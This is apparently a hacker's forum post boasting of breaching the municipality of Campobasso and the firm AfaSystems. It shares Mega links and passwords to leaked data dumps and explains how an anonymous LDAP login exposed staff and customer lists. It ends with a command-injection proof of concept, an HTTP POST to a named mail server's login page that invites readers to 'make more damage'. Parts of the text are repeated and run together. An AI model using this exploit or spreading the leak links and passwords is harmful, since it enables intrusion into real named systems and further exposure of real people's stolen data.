Hey everyone, today I'm gonna tell you how I got into the systems of the municipality of Campobasso and the company that ran those systems.
Here are the links:
From there, it was super easy to extract all the files since the server was a single server where everything was hosted. Also, users were connected to an internal LDAP server, which let me grab the list of all employees/customers/users because it allowed anonymous login from LAN.
Not much more to say, enjoy the data and PLEASE, IF YOU CAN, DOWNLOAD THEM QUICKLY SINCE MY MEGA ACCOUNT AND/OR LINKS WILL PROBABLY BE CLOSED SOON THANKS TO THOSE USELESS THREAT INTELLIGENCE COMPANIES AND ETC.
Links:
RCE If you want to continue the job and make more damage :P
PS:
The same poc works also for https://mail.comune.campobasso.it/, since they use the same Software.
Here are the links:
- AfaSystems (200GB ~) (https://www.afasystems.it/)
- Municipality of Campobasso (100GB ~) (https://www.comune.campobasso.it)
From there, it was super easy to extract all the files since the server was a single server where everything was hosted. Also, users were connected to an internal LDAP server, which let me grab the list of all employees/customers/users because it allowed anonymous login from LAN.
Not much more to say, enjoy the data and PLEASE, IF YOU CAN, DOWNLOAD THEM QUICKLY SINCE MY MEGA ACCOUNT AND/OR LINKS WILL PROBABLY BE CLOSED SOON THANKS TO THOSE USELESS THREAT INTELLIGENCE COMPANIES AND ETC.
Links:
Campobasso: https://mega.nz/#P!AgCxK1RYpsrntGHN...RzibBNL3JTzy5XHom3GSwxZJkigJe8fAl0HZGMCcHvNkA
Password:
Afasystems: https://mega.nz/#P!AgC07zWNlgDfjuCA...fDS7CuiQup3xUMfeZTaskw6yiMojoJxBf7V2-wmGXtLeg
Password:
Password:
K6QtE2T$%ZB5A6#8*Q23$5b68Afasystems: https://mega.nz/#P!AgC07zWNlgDfjuCA...fDS7CuiQup3xUMfeZTaskw6yiMojoJxBf7V2-wmGXtLeg
Password:
d22DN^e^2L!662$p&@S98z6W%RCE If you want to continue the job and make more damage :P
HTTP:
POST /cgi-bin/login.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: mail.afasystems.it
Connection: Keep-alive
back=https://mail.afasystems.it/frontend/home/indexmn.cgi&nojs=yes&password=randompass&requesttoken=z88gfd.o.umP2EazjSoEAnFCWEBOYd&timezone=Europe/Berlin&timezone-offset=2&username=%24(<command to inject>)
The same poc works also for https://mail.comune.campobasso.it/, since they use the same Software.